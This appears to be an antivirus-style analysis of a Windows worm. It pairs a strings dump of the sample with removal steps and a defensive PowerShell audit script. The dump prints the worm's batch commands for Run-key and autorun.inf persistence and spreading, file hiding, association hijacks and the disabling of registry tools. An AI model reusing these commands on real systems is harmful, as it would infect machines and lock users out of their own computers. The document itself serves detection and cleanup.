echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf  r  s  h >>d:\setup.bat
attrib d:\setup.bat  r  s  h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat  r  s  h%
attrib %systemroot%/windows.bat  r  s  h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat  r  s  h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf  r  s  h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf  r  s  h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat  r  s  h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat  r  s  h >nul
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
c:\guanlian.bat
goto 22
c:\slears.bat
.slear
d:\sleartest.exe
adm-music.com
O%u,%
J÷%
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
c:\windows\system32\
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
VVV.dywt.com.cn
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
UnhookWindowsHookEx
.text
`.rdata
@.data
.rsrc
(*.*)


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager). Note that net.exe and net1.exe are legitimate Windows binaries spawned by the sample; the process IDs below are from the sandbox run and will differ on an infected machine:

    net.exe:1364
    net.exe:1772
    net1.exe:1316
    net1.exe:644

  2. Delete the original Generic file.
  3. Delete or disinfect the following files created/modified by the Generic:

    C:\slear.bat (50 bytes)
    %System%\slear.exe (1425 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "slear.exe" = "c:\windows\system32\slear.exe"

  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
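The batch-file strings above (the "assoc .ext=nullfile" hijacks and the Policies\System and Policies\Explorer lockdown values) and the manual removal steps describe the same set of artefacts. The script below is an added example, not part of the Lavasoft report or the sample, that audits a machine for every artefact the report names and reverts them when run with -Remove. It assumes PowerShell 2.0 or later (Get-WmiObject rather than Get-CimInstance, so it also runs on the XP SP3 analysis platform), an elevated prompt, that hijacked associations should be restored to their stock Windows ProgIDs, and that SHOWALL\CheckedValue should be restored to its default of 1; the report lists that key but not the value written. C:\guanlian.bat and C:\slears.bat appear only in the strings dump, so their presence is checked but not assumed.

```powershell
# Added example (not the report's or the sample's code): audit for the artefacts listed
# above; with -Remove, revert them. Run from an elevated PowerShell prompt.
# Assumptions not stated by the report: PowerShell 2.0+, stock ProgIDs for the hijacked
# extensions, and a default SHOWALL\CheckedValue of 1.
param([switch]$Remove)

$findings = @()

# 1. Processes. net.exe/net1.exe are legitimate Windows binaries the sample spawned; the
#    PIDs in the report are from the sandbox, so match by name and review before killing.
foreach ($p in @(Get-Process -Name net, net1 -ErrorAction SilentlyContinue)) {
    $findings += "process $($p.Name) pid $($p.Id)"
    if ($Remove) { Stop-Process -Id $p.Id -Force }
}

# 2. Dropped files (the two extra .bat paths are taken from the strings dump).
foreach ($f in 'C:\slear.bat', "$env:SystemRoot\System32\slear.exe", 'C:\guanlian.bat', 'C:\slears.bat') {
    if (Test-Path -LiteralPath $f) {
        $findings += "file $f"
        if ($Remove) { Remove-Item -LiteralPath $f -Force }
    }
}

# 3. Persistence: the "slear.exe" value under HKCU\...\Run.
$run = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$v = (Get-ItemProperty -Path $run -Name 'slear.exe' -ErrorAction SilentlyContinue).'slear.exe'
if ($v) {
    $findings += "Run value slear.exe = $v"
    if ($Remove) { Remove-ItemProperty -Path $run -Name 'slear.exe' }
}

# 4. Policy lockdown values written by the dropped batch files.
$policies = @{
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'   = @('DisableRegistryTools')
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' = @('NoLogOff', 'NoRecentDocsMenu', 'NoViewContextMenu', 'NoSetFolders')
}
foreach ($key in $policies.Keys) {
    foreach ($name in $policies[$key]) {
        $val = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name
        if ($val -eq 1) {
            $findings += "policy $key\$name = 1"
            if ($Remove) { Remove-ItemProperty -Path $key -Name $name }
        }
    }
}

# 5. Hidden-file visibility. The sample touches SHOWALL\CheckedValue; the default is 1.
$showall = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'
$cv = (Get-ItemProperty -Path $showall -Name CheckedValue -ErrorAction SilentlyContinue).CheckedValue
if ($cv -ne $null -and $cv -ne 1) {
    $findings += "SHOWALL\CheckedValue = $cv"
    if ($Remove) { Set-ItemProperty -Path $showall -Name CheckedValue -Value 1 -Type DWord }
}

# 6. File associations pointed at "nullfile" (assoc .ext=nullfile), mapped back to stock ProgIDs.
$stock = @{ '.exe' = 'exefile'; '.reg' = 'regfile'; '.bat' = 'batfile'; '.cmd' = 'cmdfile';
            '.vbs' = 'VBSFile'; '.txt' = 'txtfile'; '.com' = 'comfile' }
foreach ($ext in $stock.Keys) {
    $assoc = cmd /c "assoc $ext" 2>$null
    if ($assoc -match '=nullfile$') {
        $findings += "assoc $assoc"
        if ($Remove) { cmd /c "assoc $ext=$($stock[$ext])" | Out-Null }
    }
}

# 7. autorun.inf on removable drives (DriveType 2) and the file its open=/shellexecute= line launches.
foreach ($d in @(Get-WmiObject Win32_LogicalDisk -Filter 'DriveType=2')) {
    $inf = Join-Path $d.DeviceID 'autorun.inf'
    if (-not (Test-Path -LiteralPath $inf)) { continue }
    $targets = @()
    foreach ($line in Get-Content -LiteralPath $inf) {
        if ($line -match '^\s*(open|shellexecute)\s*=\s*"?([^"]+?)"?\s*$') {
            $targets += Join-Path $d.DeviceID $Matches[2].Trim()
        }
    }
    $findings += "autorun $inf -> $($targets -join ', ')"
    if ($Remove) {
        Remove-Item -LiteralPath $inf -Force
        # Only delete a launch target that resolves to an existing file on that drive.
        foreach ($t in $targets) { if (Test-Path -LiteralPath $t) { Remove-Item -LiteralPath $t -Force } }
    }
}

if ($findings.Count -eq 0) { 'No artefacts from this report found.' } else { $findings }
```

Run it once without -Remove and review the findings first: the association and policy checks only fire on the exact values the report lists, so a clean result does not prove the machine is uninfected, and a removable drive whose autorun.inf names a different dropper is reported but the target is deleted only if it resolves to a real file.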
